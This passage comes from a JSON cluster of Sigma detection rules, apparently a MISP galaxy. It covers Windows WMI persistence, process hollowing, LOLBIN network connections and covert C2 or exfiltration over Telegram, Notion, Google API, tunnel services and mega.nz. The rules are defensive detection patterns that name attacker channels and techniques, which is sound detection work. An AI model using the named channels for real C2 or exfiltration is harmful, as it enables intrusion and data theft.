"3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bb780e0c-16cf-4383-8383-1e5471db6cf9", "value": "Suspicious XOR Encoded PowerShell Command" }, { "description": "Detects suspicious encoded payloads in WMI Event Consumers", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-09-01", "falsepositive": [ "Unknown" ], "filename": "sysmon_wmi_susp_encoded_scripts.yml", "level": "high", "logsource.category": "wmi_event", "logsource.product": "windows", "refs": [ "https://github.com/RiccardoAncarani/LiquidSnake", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.persistence", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", "value": "Suspicious Encoded Scripts in a WMI Consumer" }, { "description": "Detects creation of WMI event subscription persistence method", "meta": { "author": "Tom Ueltschi (@c_APT_ure)", "creation_date": "2019-01-12", "falsepositive": [ "Exclude legitimate (vetted) use of WMI event subscription in your network" ], "filename": "sysmon_wmi_event_subscription.yml", "level": "medium", "logsource.category": "wmi_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected", "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-20-wmievent-wmieventconsumer-activity-detected", "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-21-wmievent-wmieventconsumertofilter-activity-detected", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" ], "tags": [ "attack.persistence", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0f06a3a5-6a09-413f-8743-e6cf35561297", "value": "WMI Event Subscription" }, { "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "creation_date": "2019-04-15", "falsepositive": [ "Legitimate administrative scripts" ], "filename": "sysmon_wmi_susp_scripting.yml", "level": "high", "logsource.category": "wmi_event", "logsource.product": "windows", "refs": [ "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", "https://github.com/RiccardoAncarani/LiquidSnake", "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" ], "tags": [ "attack.execution", "attack.t1059.005" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "value": "Suspicious Scripting in a WMI Consumer" }, { "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", "meta": { "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "creation_date": "2022-01-25", "falsepositive": [ "Unknown" ], "filename": "proc_tampering_susp_process_hollowing.yml", "level": "medium", "logsource.category": "process_tampering", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/", "https://twitter.com/SecurePeacock/status/1486054048390332423?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_tampering/proc_tampering_susp_process_hollowing.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055.012" ] }, "related": [ { "dest-uuid": "b200542e-e877-4395-875b-cf1a44537ca4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4b890e5-8d8c-4496-8c66-c805753817cd", "value": "Potential Process Hollowing Activity" }, { "description": "Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-19", "falsepositive": [ "Legitimate applications communicating with the Telegram API e.g. web browsers not in the exclusion list, app with an RSS etc." ], "filename": "net_connection_win_domain_telegram_api_non_browser_access.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_telegram_api_non_browser_access.yml" ], "tags": [ "attack.command-and-control", "attack.t1102" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c3dbbc9f-ef1d-470a-a90a-d343448d5875", "value": "Suspicious Non-Browser Network Communication With Telegram API" }, { "description": "Detects a network connection initiated by \"Regsvr32.exe\"", "meta": { "author": "Dmitriy Lifanov, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_regsvr32_network_activity.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" ], "tags": [ "attack.execution", "attack.t1559.001", "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c7e91a02-d771-4a6d-a700-42587e0b1095", "value": "Network Connection Initiated By Regsvr32.EXE" }, { "description": "Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\n", "meta": { "author": "Kamran Saifullah", "creation_date": "2023-11-20", "falsepositive": [ "Legitimate use of Visual Studio Code tunnel will also trigger this." ], "filename": "net_connection_win_domain_vscode_tunnel_connection.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://cydefops.com/vscode-data-exfiltration", "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_vscode_tunnel_connection.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.001" ] }, "related": [ { "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b657234-038e-4ad5-997c-4be42340bce4", "value": "Network Connection Initiated To Visual Studio Code Tunnels Domain" }, { "description": "Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\n", "meta": { "author": "Kamran Saifullah", "creation_date": "2023-11-20", "falsepositive": [ "Legitimate use of Devtunnels will also trigger this." ], "filename": "net_connection_win_domain_devtunnels.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2", "https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security", "https://cydefops.com/devtunnels-unleashed", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_devtunnels.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.001" ] }, "related": [ { "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4", "value": "Network Connection Initiated To DevTunnels Domain" }, { "description": "Detects a network connection initiated by a binary to \"api.mega.co.nz\".\nAttackers were seen abusing file sharing websites similar to \"mega.nz\" in order to upload/download additional payloads.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-12-06", "falsepositive": [ "Legitimate MEGA installers and utilities are expected to communicate with this domain. Exclude hosts that are known to be allowed to use this tool." ], "filename": "net_connection_win_domain_mega_nz.yml", "level": "low", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://megatools.megous.com/", "https://www.mandiant.com/resources/russian-targeting-gov-business", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_mega_nz.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.001" ] }, "related": [ { "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "value": "Network Connection Initiated To Mega.nz" }, { "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-02-16", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_rdp_reverse_tunnel.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1096842275437625346", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml" ], "tags": [ "attack.command-and-control", "attack.t1572", "attack.lateral-movement", "attack.t1021.001", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "value": "RDP Over Reverse SSH Tunnel" }, { "description": "Detects a rundll32 that communicates with public IP addresses", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-11-04", "falsepositive": [ "Communication to other corporate systems that use IP addresses from public address spaces" ], "filename": "net_connection_win_rundll32_net_connections.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011", "attack.execution" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cdc8da7d-c303-42f8-b08c-b4ab47230263", "value": "Rundll32 Internet Connection" }, { "description": "Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as \"OffensiveNotion C2\"", "meta": { "author": "Gavin Knapp", "creation_date": "2023-05-03", "falsepositive": [ "Legitimate applications communicating with the \"api.notion.com\" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured." ], "filename": "net_connection_win_domain_notion_api_susp_communication.yml", "level": "low", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/mttaggart/OffensiveNotion", "https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_notion_api_susp_communication.yml" ], "tags": [ "attack.command-and-control", "attack.t1102" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7e9cf7b6-e827-11ed-a05b-15959c120003", "value": "Potentially Suspicious Network Connection To Notion API" }, { "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", "meta": { "author": "frack113", "creation_date": "2022-01-07", "falsepositive": [ "Other SMTP tools" ], "filename": "net_connection_win_susp_outbound_smtp_connections.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://www.ietf.org/rfc/rfc2821.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.003" ] }, "related": [ { "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9976fa64-2804-423c-8a5b-646ade840773", "value": "Suspicious Outbound SMTP Connections" }, { "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", "meta": { "author": "elhoim", "creation_date": "2022-04-28", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_susp_outbound_mobsync_connection.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/intelligence-insights-november-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml" ], "tags": [ "attack.t1055", "attack.t1218", "attack.execution", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "value": "Microsoft Sync Center Suspicious Network Connections" }, { "description": "Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)\n", "meta": { "author": "Gavin Knapp", "creation_date": "2023-05-01", "falsepositive": [ "Legitimate applications communicating with the \"googleapis.com\" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning." ], "filename": "net_connection_win_domain_google_api_non_browser_access.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/", "https://github.com/looCiprian/GC2-sheet", "https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/", "https://youtu.be/n2dFlSaBBKo", "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_google_api_non_browser_access.yml" ], "tags": [ "attack.command-and-control", "attack.t1102" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7e9cf7b6-e827-11ed-a05b-0242ac120003", "value": "Suspicious Non-Browser Network Communication With Google API" }, { "description": "Detects programs that connect to uncommon destination ports", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-19", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_susp_malware_callback_ports_uncommon.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1571" ] }, "related": [ { "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6d8c3d20-a5e1-494f-8412-4571d716cf5c", "value": "Communication To Uncommon Destination Ports" }, { "description": "Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.\n", "meta": { "author": "frack113", "creation_date": "2022-01-22", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_imewdbld.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8d7e392e-9b28-49e1-831d-5949c6281228", "value": "Network Connection Initiated By IMEWDBLD.EXE" }, { "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", "meta": { "author": "frack113, Florian Roth (Nextron Systems)", "creation_date": "2022-08-28", "falsepositive": [ "Legitimate scripts" ], "filename": "net_connection_win_wscript_cscript_outbound_connection.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wscript_cscript_outbound_connection.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "992a6cae-db6a-43c8-9cec-76d7195c96fc", "value": "Outbound Network Connection Initiated By Script Interpreter" }, { "description": "Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2024-05-31", "falsepositive": [ "Legitimate use of portmap.io domains" ], "filename": "net_connection_win_domain_portmap.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/rapid7/metasploit-framework/issues/11337", "https://portmap.io/", "https://pro.twitter.com/JaromirHorejsi/status/1795001037746761892/photo/2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_portmap.yml" ], "tags": [ "attack.t1041", "attack.command-and-control", "attack.t1090.002", "attack.exfiltration" ] }, "related": [ { "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07837ab9-60e1-481f-a74d-c31fb496a94c", "value": "Network Communication Initiated To Portmap.IO Domain" }, { "description": "Detects a network connection initiated by Cmstp.EXE\nIts uncommon for \"cmstp.exe\" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-30", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_cmstp_initiated_connection.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_cmstp_initiated_connection.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.003" ] }, "related": [ { "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "efafe0bf-4238-479e-af8f-797bd3490d2d", "value": "Outbound Network Connection Initiated By Cmstp.EXE" }, { "description": "Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses.\nThis rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.\nThis rule will require an initial baseline and tuning that is specific to your organization.\n", "meta": { "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-11-10", "falsepositive": [ "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", "Office documents commonly have templates that refer to external addresses, like \"sharepoint.ourcompany.com\" may have to be tuned.", "It is highly recommended to baseline your activity and tune out common business use cases." ], "filename": "net_connection_win_office_outbound_non_local_ip.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://corelight.com/blog/detecting-cve-2021-42292", "https://learn.microsoft.com/de-de/microsoft-365/enterprise/urls-and-ip-address-ranges?view=o365-worldwide", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_office_outbound_non_local_ip.yml" ], "tags": [ "attack.execution", "attack.t1203" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "value": "Office Application Initiated Network Connection To Non-Local IP" }, { "description": "Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.", "meta": { "author": "frack113", "creation_date": "2021-12-10", "falsepositive": [ "Legitimate python scripts using the socket library or similar will trigger this. Apply additional filters and perform an initial baseline before deploying." ], "filename": "net_connection_win_python.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://pypi.org/project/scapy/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", "value": "Python Initiated Connection" }, { "description": "Detects network connections to Cloudflared tunnels domains initiated by a process on the system.\nAttackers can abuse that feature to establish a reverse shell or persistence on a machine.\n", "meta": { "author": "Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-05-27", "falsepositive": [ "Legitimate use of cloudflare tunnels will also trigger this." ], "filename": "net_connection_win_domain_cloudflared_communication.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://defr0ggy.github.io/research/Abusing-Cloudflared-A-Proxy-Service-To-Host-Share-Applications/", "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_cloudflared_communication.yml" ], "tags": [ "attack.exfiltration", "attack.command-and-control", "attack.t1567.001" ] }, "related": [ { "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7cd1dcdc-6edf-4896-86dc-d1f19ad64903", "value": "Network Connection Initiated To Cloudflared Tunnels Domains" }, { "description": "Detects a possible remote connections to Silenttrinity c2", "meta": { "author": "Kiran kumar s, oscd.community", "creation_date": "2020-10-11", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml" ], "tags": [ "attack.execution", "attack.t1127.001" ] }, "related": [ { "dest-uuid": "c92e3d68-2349-49e4-a341-7edca2deff96", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "50e54b8d-ad73-43f8-96a1-5191685b17a4", "value": "Silenttrinity Stager Msbuild Activity" }, { "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-29", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_rdp_to_http.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" ], "tags": [ "attack.command-and-control", "attack.t1572", "attack.lateral-movement", "attack.t1021.001", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "value": "RDP to HTTP or HTTPS Target Ports" }, { "description": "Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.\n", "meta": { "author": "frack113", "creation_date": "2022-08-28", "falsepositive": [ "Legitimate scripts" ], "filename": "net_connection_win_wscript_cscript_local_connection.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wscript_cscript_local_connection.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "08249dc0-a28d-4555-8ba5-9255a198e08c", "value": "Local Network Connection Initiated By Script Interpreter" }, { "description": "Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.", "meta": { "author": "X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-12", "falsepositive": [ "Other ports can be used, apply additional filters accordingly" ], "filename": "net_connection_win_office_uncommon_ports.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_office_uncommon_ports.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control" ] }, "uuid": "3b5ba899-9842-4bc2-acc2-12308498bf42", "value": "Office Application Initiated Network Connection Over Uncommon Ports" }, { "description": "Detects a network connection initiated by the Add-In deployment cache updating utility \"AddInutil.exe\".\nThis could indicate a potential command and control communication as this tool doesn't usually initiate network activity.\n", "meta": { "author": "Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)", "creation_date": "2023-09-18", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_addinutil_initiated.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_addinutil_initiated.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5205613d-2a63-4412-a895-3a2458b587b3", "value": "Network Connection Initiated By AddinUtil.EXE" }, { "description": "Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2018-08-30", "falsepositive": [ "Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule." ], "filename": 